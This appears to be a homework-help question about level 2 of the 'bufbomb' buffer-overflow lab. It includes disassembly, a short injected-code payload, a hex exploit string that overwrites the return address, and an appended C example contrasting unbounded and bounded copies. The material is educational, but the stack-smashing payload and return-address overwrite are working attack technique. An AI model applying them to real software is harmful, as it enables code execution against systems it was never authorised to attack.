Question: A much more sophisticated form of buffer attack involves supplying a string that encodes actual machine instructions. The exploit string then overwrites the return

A much more sophisticated form of buffer attack involves supplying a string that encodes actual machine instructions. The exploit string then overwrites the return pointer with the starting address of these instructions on the stack. When the calling function (in this case getbuf) executes its ret instruction, the program will start executing the instructions on the stack rather than returning. With this form of attack, you can get the program to do almost anything. The code you place on the stack is called the exploit code. This style of attack is tricky, though, because you must get machine code onto the stack and set the return pointer to the start of this code.

Within the file bufbomb there is a function bang having the following C code:

    int global_value = 0;

    void bang(int val)
    {
        if (global_value == cookie) {
            printf("Bang!: You set global_value to 0x%x\n", global_value);
            validate(2);
        } else
            printf("Misfire: global_value = 0x%x\n", global_value);
        exit(0);
    }

Similar to Levels 0 and 1, your task is to get BUFBOMB to execute the code for bang rather than returning to test. Before this, however, you must set global variable global_value to your userid's cookie. Your exploit code should set global_value, push the address of bang on the stack, and then execute a ret instruction to cause a jump to the code for bang.

My dump code for getbuf and bang is as follows. For getbuf:

    0x804926e  push   %ebp
    0x804926f  mov    %esp,%ebp
    0x8049271  push   %ebx
    0x8049272  sub    $0x24,%esp
    0x8049275  call   0x8049266 <__x86.get_pc_thunk.ax>
    0x804927a  add    $0xc2d86,%eax
    0x804927f  sub    $0xc,%esp
    0x8049282  lea    -0x28(%ebp),%edx
    0x8049285  push   %edx
    0x8049286  mov    %eax,%ebx
    0x8049288  call   0x8048c64
    0x804928d  add    $0x10,%esp
    0x8049290  mov    $0x1,%eax
    0x8049295  mov    -0x4(%ebp),%ebx
    0x8049298  leave
    0x8049299  ret

and for bang:

    0x08048a02 <+0>:    push   %ebp
    0x08048a03 <+1>:    mov    %esp,%ebp
    0x08048a05 <+3>:    push   %ebx
    0x08048a06 <+4>:    sub    $0x4,%esp
    0x08048a09 <+7>:    call   0x8048840 <__x86.get_pc_thunk.bx>
    0x08048a0e <+12>:   add    $0xc35f2,%ebx
    0x08048a14 <+18>:   mov    0x24d4(%ebx),%eax
    0x08048a1a <+24>:   mov    %eax,%edx
    0x08048a1c <+26>:   mov    0x24cc(%ebx),%eax
    0x08048a22 <+32>:   cmp    %eax,%edx
    0x08048a24 <+34>:   jne    0x8048a4e
    0x08048a26 <+36>:   mov    0x24d4(%ebx),%eax
    0x08048a2c <+42>:   sub    $0x8,%esp
    0x08048a2f <+45>:   push   %eax
    0x08048a30 <+46>:   lea    -0x36ddc(%ebx),%eax
    0x08048a36 <+52>:   push   %eax
    0x08048a37 <+53>:   call   0x8051d70
    0x08048a3c <+58>:   add    $0x10,%esp
    0x08048a3f <+61>:   sub    $0xc,%esp
    0x08048a42 <+64>:   push   $0x2
    0x08048a44 <+66>:   call   0x8049463
    0x08048a49 <+71>:   add    $0x10,%esp
    0x08048a4c <+74>:   jmp    0x8048a67
    0x08048a4e <+76>:   mov    0x24d4(%ebx),%eax
    0x08048a54 <+82>:   sub    $0x8,%esp
    0x08048a57 <+85>:   push   %eax
    0x08048a58 <+86>:   lea    -0x36db7(%ebx),%eax
    0x08048a5e <+92>:   push   %eax
    0x08048a5f <+93>:   call   0x8051d70
    0x08048a64 <+98>:   add    $0x10,%esp
    0x08048a67 <+101>:  sub    $0xc,%esp
    0x08048a6a <+104>:  push   $0x0
    0x08048a6c <+106>:  call   0x8050d00

What I know is that my bang address is 0x08048a02, my global value is 0x810e4d, my stack address is 0x556833a8 before calling bang, and my cookie address is 0x7445bfb8. What I have for my assembly file is

    movl $0x7445bfb8, 0x810e4d4
    push $0x08048a02
    ret

and I am using 44 bits of padding, but I get a segmentation error. I am not sure if my assembly file is wrong and/or if I have the wrong amount of padding (the input file that gives the error is below):

    61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 a8 33 68 55 c7 05 d4 e4 10 08 b8 bf 45 74 68 02 8a 04 08 c3
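For readers working through why getbuf is exploitable at all, here is an added C example; it is not part of the question above and not the lab's own bufbomb code. It places the defect (a Gets-style copy with no length check, which lets a long line walk past the buffer into the saved registers and return address) beside the hardened form (a bounded copy that refuses a line that will not fit), plus the size check a validator or fuzz harness would apply before any copy. BUF_SIZE, the function names and the sample inputs are my assumptions; the lab's real buffer size is not stated on the page.

```c
#include <stdio.h>
#include <string.h>

/* Assumption: a fixed-size stack buffer, like the one getbuf reads into.
 * The lab's real size is not given on the page; 32 is a constructed value. */
#define BUF_SIZE 32

/* Gets-style copy with no length check (hypothetical stand-in for the
 * lab's Gets()).  Every byte of src is written to dst, so an input longer
 * than the destination runs into whatever sits above the buffer in the
 * frame: the saved %ebx, the saved %ebp and the return address.  Kept only
 * as the "before" picture; main() and the tests never overflow it. */
static size_t unbounded_copy(char *dst, const char *src)
{
    size_t i = 0;
    while (src[i] != '\0') {
        dst[i] = src[i];
        i++;
    }
    dst[i] = '\0';
    return i;
}

/* Hardened read: stores at most dst_size-1 bytes plus the NUL and reports
 * an input that does not fit as an error instead of truncating silently.
 * Returns the number of bytes stored, or -1 on overflow / empty buffer. */
static int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (dst_size == 0)
        return -1;
    if (len >= dst_size) {      /* len + 1 (for the NUL) > dst_size */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);
    return (int)len;
}

/* Predicate a validator or fuzz harness can apply before any copy:
 * does an input of input_len bytes fit in buf_size bytes with its NUL? */
static int would_overflow(size_t input_len, size_t buf_size)
{
    return input_len + 1 > buf_size;
}

/* Fixed counterpart of getbuf: same buffer, but the read is bounded and an
 * oversized line is refused rather than overwriting the frame. */
static int getbuf_fixed(const char *input)
{
    char buf[BUF_SIZE];
    if (bounded_copy(buf, sizeof buf, input) < 0)
        return -1;              /* caller treats this as a rejected line */
    return 1;                   /* mirrors getbuf's normal return value */
}

int main(void)
{
    /* Constructed sample inputs: one that fits, and one of 44 'a' bytes,
     * the same padding length the question uses. */
    const char *ok = "hello";
    char big[45];
    memset(big, 'a', 44);
    big[44] = '\0';

    char scratch[64];           /* large enough, so the unbounded copy is safe here */
    printf("unbounded copy stored %zu bytes into a 64-byte buffer\n",
           unbounded_copy(scratch, ok));
    printf("would a %zu-byte line overflow BUF_SIZE=%d? %d\n",
           strlen(big), BUF_SIZE, would_overflow(strlen(big), BUF_SIZE));
    printf("getbuf_fixed(\"hello\")   = %d\n", getbuf_fixed(ok));
    printf("getbuf_fixed(44 x 'a')  = %d\n", getbuf_fixed(big));
    return 0;
}
```

The bounded variant is what a fix to getbuf looks like: the 44-byte line returns -1 instead of being written over the saved frame. On a current toolchain the compiler's stack protector and a non-executable stack would additionally abort the process before any stack-resident code could run, which is why this lab is built with those mitigations turned off.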
